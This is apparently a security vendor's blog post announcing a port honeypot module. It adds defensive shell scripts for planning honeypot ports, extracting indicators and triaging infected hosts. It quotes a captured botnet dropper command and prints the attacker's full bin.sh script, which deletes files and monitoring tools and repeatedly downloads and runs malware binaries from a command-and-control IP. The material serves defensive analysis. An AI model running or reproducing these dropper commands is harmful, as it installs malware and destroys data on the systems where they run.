Port HoneyPot is ready for action

A long time ago, in a galaxy far, far away … Ohh wait, it's happening right now. Yeah, one of the most anticipated ninja modules, the 'gorgeous' Port Honeypot, has been released. I know what you are thinking now: "How can it be gorgeous? Seriously, this is a security function." Let me introduce you to this sexy component of the ninja protection; even Winnie the Pooh can't say no to it.

More about Port Honeypot

This is a general-purpose honeypot module. Once activated, it sets up 100 honeypots on your server, on random ports chosen from the 1,000 most popular ports. It detects deep port scans against your server (SYN stealth scans and some other scan types excepted), and it captures all traffic sent to these honeypots, so when an attacker tries to exploit one of the fake services an incident is generated. This is a very effective way to catch attacks and botnet activity early.

Port Honeypot does not bind to the actual ports. It binds to a port above 60,000 and uses iptables rules to forward traffic from the actual ports, so that no port is ever blocked for real services. If a daemon starts listening on a honeypot port, the module automatically stops using that port as a honeypot. When the module starts, it also lists all sockets in listening state and does not start a honeypot on any active port. This way the module automatically avoids collisions with real services. If you want, you can set ports that should always be used for honeypot purposes, and ports that should never be used as honeypots.
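To make the mechanism above concrete, here is an added example (my own code, not BitNinja's; the module's real rule set is not published on this page) that plans honeypot ports the way the post describes: pinned and excluded port lists, collision avoidance against sockets already in LISTEN state, and a nat-table REDIRECT from each real port to a listener above 60,000. The candidate list, the counts and the ALWAYS_PORTS/NEVER_PORTS values are assumed sample settings standing in for the 1,000-port list and the operator's configuration.

```shell
#!/bin/sh
# Added example, not BitNinja's code: a port planner that behaves the way the post
# describes (random picks from a popular-port list, operator pin/exclude lists,
# collision avoidance with real listeners, REDIRECT rules to a listener above 60000).
# The candidate list, counts and pin/exclude lists here are assumed sample values.

ALWAYS_PORTS="23 2323"   # always honeypot these (assumed operator setting)
NEVER_PORTS="22 443"     # never honeypot these (assumed operator setting)
LISTEN_BASE=60000        # honeypot daemons bind above this; real ports are redirected
SEED=${SEED:-$$}         # set SEED for a reproducible plan

# in_list PORT "LIST": true if PORT is in the space-separated LIST
in_list() {
    case " $2 " in *" $1 "*) return 0 ;; esac
    return 1
}

# listening_ports: TCP ports currently in LISTEN state, space-separated
# (handles the *:22, 0.0.0.0:22 and [::]:22 address forms ss prints)
listening_ports() {
    ss -lntH 2>/dev/null | awk '{ n = split($4, a, ":"); print a[n] }' | sort -un | tr '\n' ' '
}

# plan_honeypots COUNT "CANDIDATES" "LISTENING": print COUNT ports, one per line.
# Pinned ports come first; the rest are a random pick from CANDIDATES minus
# NEVER_PORTS minus LISTENING.  A pinned port that a real daemon already owns is
# skipped too, since redirecting it would steal the daemon's traffic.
plan_honeypots() {
    count=$1; candidates=$2; listening=$3
    {
        for p in $ALWAYS_PORTS; do
            if in_list "$p" "$listening"; then continue; fi
            echo "$p"
        done
        for p in $candidates; do
            if in_list "$p" "$ALWAYS_PORTS"; then continue; fi   # already emitted
            if in_list "$p" "$NEVER_PORTS";  then continue; fi
            if in_list "$p" "$listening";    then continue; fi
            echo "$p"
        done | awk -v s="$SEED" 'BEGIN { srand(s) } { print rand() "\t" $0 }' | sort -n | cut -f2
    } | head -n "$count" | sort -n
}

# emit_redirect_rules < PORTS: one nat-table REDIRECT per port; the i-th honeypot
# listens on LISTEN_BASE+i, so the honeypot never binds the real port itself.
emit_redirect_rules() {
    i=0
    while read -r port; do
        [ -n "$port" ] || continue
        i=$((i + 1))
        echo "iptables -t nat -A PREROUTING -p tcp --dport $port -j REDIRECT --to-ports $((LISTEN_BASE + i))"
    done
}

# released_ports "PLAN" "LISTENING": honeypot ports a real daemon has since claimed;
# delete their REDIRECT rule and stop that honeypot, as the post says the module does.
released_ports() {
    for p in $1; do
        if in_list "$p" "$2"; then echo "$p"; fi
    done
}

if [ "${1:-}" = "--demo" ]; then
    # sample candidate list standing in for the 1,000 most popular ports
    plan=$(plan_honeypots 5 "21 23 25 80 110 143 443 445 3306 3389 5900 8080" "$(listening_ports)")
    printf '%s\n' "$plan" | emit_redirect_rules
fi
```

Run with `--demo` to print the rules; pipe that output to `sh` as root to apply them. Two caveats: REDIRECT in the nat PREROUTING chain only sees traffic arriving from the network, so test from another host rather than with a local connection, and the plan has to be re-evaluated whenever the listener set changes, which is what released_ports is for.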

Read more about how to configure this module, and about the chat scripts that can be used to fake services even more realistically >> Yeah, let's go to the documentation

(For customers: the new feature version is out and ready for a manual update. We will auto-update it for you on Thursday.)

Fun facts

We have captured more than 10,000 incidents on 5 test servers with this new module. Here is one of them, truncated as captured:

{
  "PORT HIT": "189.14.202.110:51313->178.22.62.146:23",
  "MESSAGES": "Array
  (
    [21:39:23] => sh
    [21:39:27] => cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin/wget;wget http://74.118.193.239/bin.sh; sh bin.sh; wget1 http://74.
    [21:39:30] => cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin/wget;wget http://74.118.193.239/bin.sh; sh bin.sh; wget1 http://74.

This is a good example of a malicious request captured by the Port HoneyPot module. You can clearly see the attacker first trying to get a shell (sh) and then sending a long command. The long command does the following:

  1. Try to cd into /tmp, /var/run, /dev/shm, /mnt or /var, whichever succeeds first, then delete every file in that directory (rm -f *).
  2. Restore a wget binary that has been renamed to -wget: move /usr/bin/-wget to /usr/bin/wget, and do the same for /usr/sbin/-wget, /bin/-wget and /sbin/-wget.
  3. Use wget to download the bin.sh script from the given C&C server and execute it with the default shell interpreter. The captured command is truncated after that point (at the wget1 call), and the same command is sent again three seconds later.
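Once a capture like this lands in an incident, the useful next step is to pull the indicators out of it: the payload URL and host to block, and the staging directories to watch. The following is an added example (my own code, not BitNinja's) that does that over lines in the "[HH:MM:SS] => command" shape shown above; SAMPLE is a trimmed copy of the captured command lines, and the tag names (downloader, shell, busybox-probe) are my own labels.

```shell
#!/bin/sh
# Added example, not BitNinja's code: pull indicators out of captured honeypot
# messages so they can be blocked or searched for elsewhere.  SAMPLE is the
# command lines from the capture above, trimmed; the functions read the
# "[HH:MM:SS] => command" shape on stdin.

SAMPLE='[21:39:23] => sh
[21:39:27] => cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;mv -f /usr/bin/-wget /usr/bin/wget;wget http://74.118.193.239/bin.sh; sh bin.sh'

# tag_lines: label each captured command; downloader lines carry the payload URL
# (tag names are this example's own, not the module's)
tag_lines() {
    while IFS= read -r line; do
        cmd=${line#*=> }                      # drop the "[HH:MM:SS] => " prefix
        case $cmd in
            *"wget http"*|*"curl http"*|*"tftp "*|*"ftpget "*) tag=downloader ;;
            *"busybox"*)                                      tag=busybox-probe ;;
            sh|/bin/sh|enable|system|shell)                   tag=shell ;;
            *)                                                tag=other ;;
        esac
        printf '%s\t%s\n' "$tag" "$cmd"
    done
}

# extract_urls: unique download URLs (stops at shell metacharacters and quotes)
extract_urls() {
    grep -oE 'https?://[^ ;"<>|&]+' | sort -u
}

# extract_hosts: host or IP from each URL, for firewall or DNS blocklists
extract_hosts() {
    extract_urls | sed -E 's#^https?://##; s#[/:].*$##' | sort -u
}

# staging_dirs: directories the dropper tries to cd into, in the order tried
staging_dirs() {
    grep -oE 'cd /[^ ;|]+' | sed 's/^cd //' | awk '!seen[$0]++'
}

if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE" | tag_lines
    printf '%s\n' "$SAMPLE" | extract_hosts
    printf '%s\n' "$SAMPLE" | staging_dirs
fi
```

On the sample this yields one downloader line, the host 74.118.193.239 and the five staging directories in the order the dropper tries them. Feed real incident messages in on stdin instead of SAMPLE; the URL pattern deliberately stops at ';', '|' and '&' because droppers chain commands with them, as the capture shows.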

What is inside the bin.sh script? We have downloaded this script for you:

#!/bin/bash
rm -f *
busybox rm -rf /tmp/*
busybox rm -rf /root/*
busybox rm -rf /usr/bin/strings
busybox rm -rf /usr/bin/ps
busybox wget http://74.118.193.239/10; busybox chmod +x 10; ./10; busybox rm -f 10*
rm -f *
busybox wget http://74.118.193.239/11; busybox chmod +x 11; ./11; busybox rm -f 11*
rm -f *
busybox wget http://74.118.193.239/13; busybox chmod +x 13; ./13; busybox rm -f 13*
rm -f *
busybox wget http://74.118.193.239/14; busybox chmod +x 14; ./14; busybox rm -f 14*
rm -f *
busybox wget http://74.118.193.239/15; busybox chmod +x 15; ./15; busybox rm -f 15*
rm -f *
busybox wget http://74.118.193.239/16; busybox chmod +x 16; ./16; busybox rm -f 16*
rm -f *
busybox wget http://74.118.193.239/17; busybox chmod +x 17; ./15; busybox rm -f 17*
rm -f *
busybox wget http://74.118.193.239/10; busybox cp /bin/busybox ./; busybox cat 10 > busybox; busybox rm -f 10; busybox cp busybox 10; busybox rm -f busybox; ./10; busybox rm -f 10*
rm -f *
busybox wget http://74.118.193.239/11; busybox cp /bin/busybox ./; busybox cat 11 > busybox; busybox rm -f 11; busybox cp busybox 11; busybox rm -f busybox; ./11; busybox rm -f 11*
rm -f *
busybox wget http://74.118.193.239/13; busybox cp /bin/busybox ./; busybox cat 13 > busybox; busybox rm -f 13; busybox cp busybox 13; busybox rm -f busybox; ./13; busybox rm -f 13*
rm -f *
busybox wget http://74.118.193.239/14; busybox cp /bin/busybox ./; busybox cat 14 > busybox; busybox rm -f 14; busybox cp busybox 14; busybox rm -f busybox; ./14; busybox rm -f 14*
rm -f *
busybox wget http://74.118.193.239/15; busybox cp /bin/busybox ./; busybox cat 15 > busybox; busybox rm -f 15; busybox cp busybox 15; busybox rm -f busybox; ./15; busybox rm -f 15*
rm -f *
busybox wget http://74.118.193.239/16; busybox cp /bin/busybox ./; busybox cat 16 > busybox; busybox rm -f 16; busybox cp busybox 16; busybox rm -f busybox; ./16; busybox rm -f 16*
rm -f *
busybox wget http://74.118.193.239/17 busybox cp /bin/busybox ./; busybox cat 17 > busybox; busybox rm -f 17; busybox cp busybox 17; busybox rm -f busybox; ./17; busybox rm -f 17*
rm -f *
exit

So, the next question is, what is in http://74.118.193.239/10 and the other six files? We have downloaded them, too. They are malware binaries. The bin.sh script downloads and executes each one in turn and deletes the file afterwards, so the malware remains in memory with no file left on disk. Two other details are worth noting: the script also deletes /usr/bin/ps and /usr/bin/strings, which hampers inspection from the infected host itself, and the second round of downloads writes each payload over a copy of busybox before running it, which appears to be a way of inheriting the executable bit without relying on chmod. The attacker's own script has bugs, too: the 17 line of the first round runs ./15 instead of ./17, and the 17 line of the second round is missing a semicolon after the wget.
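Because the payloads are deleted right after they start, a file-system scan finds nothing. What does remain visible is the running process: on Linux, /proc/PID/exe of a process whose binary has been unlinked has " (deleted)" appended to its link target, and a process running from /tmp or /dev/shm is suspicious in its own right. The following is an added triage script (my own, not BitNinja's) built on those two facts plus a check that the tools bin.sh deletes are still present. The PROC_ROOT and BINDIR parameters exist so the checks can be exercised against a constructed directory tree; on a real host they default to /proc and /usr/bin.

```shell
#!/bin/sh
# Added example, not BitNinja's code: a triage list for the situation described above,
# where the dropper deleted its payload files but the processes keep running.
# PROC_ROOT is a parameter so the checks run against a constructed tree as well as /proc;
# run as root for full coverage, since /proc/PID/exe of other users' processes is unreadable.

# directories the captured dropper tries to stage in (from the capture above)
STAGING_DIRS="/tmp /var/run /dev/shm /mnt /var"

# pid_of LINKPATH ROOT: ROOT/123/exe -> 123
pid_of() {
    p=${1#"$2"/}; echo "${p%/exe}"
}

# deleted_exe_procs [PROC_ROOT]: processes whose executable is gone from disk.
# The kernel appends " (deleted)" to the /proc/PID/exe link target in that case.
deleted_exe_procs() {
    root=${1:-/proc}
    for exe in "$root"/[0-9]*/exe; do
        [ -L "$exe" ] || continue
        target=$(readlink "$exe" 2>/dev/null) || continue
        case $target in
            *" (deleted)") printf '%s\t%s\n' "$(pid_of "$exe" "$root")" "$target" ;;
        esac
    done
    return 0
}

# staging_dir_procs [PROC_ROOT]: processes executing from a dropper staging directory,
# whether or not the file still exists.
staging_dir_procs() {
    root=${1:-/proc}
    for exe in "$root"/[0-9]*/exe; do
        [ -L "$exe" ] || continue
        target=$(readlink "$exe" 2>/dev/null) || continue
        path=${target%" (deleted)"}
        for d in $STAGING_DIRS; do
            case $path in
                "$d"/*) printf '%s\t%s\n' "$(pid_of "$exe" "$root")" "$path"; break ;;
            esac
        done
    done
    return 0
}

# missing_tools [BINDIR]: inspection tools bin.sh removes (ps, strings); if they are
# gone, the host has likely already run the script and its own output cannot be trusted.
missing_tools() {
    dir=${1:-/usr/bin}
    for t in ps strings; do
        [ -x "$dir/$t" ] || echo "$t"
    done
    return 0
}

if [ "${1:-}" = "--scan" ]; then
    echo "== running with deleted executable"; deleted_exe_procs
    echo "== running from a staging directory"; staging_dir_procs
    echo "== missing tools"; missing_tools
fi
```

Run it with `--scan` as root. Treat the output as a triage list, not a verdict: a " (deleted)" executable also shows up for legitimate daemons still running a binary that a package upgrade replaced, and /var is broad enough that some legitimate software lives under it. Since the dropper removes ps, the script deliberately reads /proc directly rather than calling ps; on a host that has already run bin.sh, copy known-good tools in from elsewhere before trusting anything the box reports.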

This is a good example of an attack that the BitNinja Port Honeypot is able to automatically protect your server against.

Happy hacker hunting! BitNinja will always be there for you.

Sign up for the 7-day BitNinja trial, and let the Port HoneyPot get the hunting party started.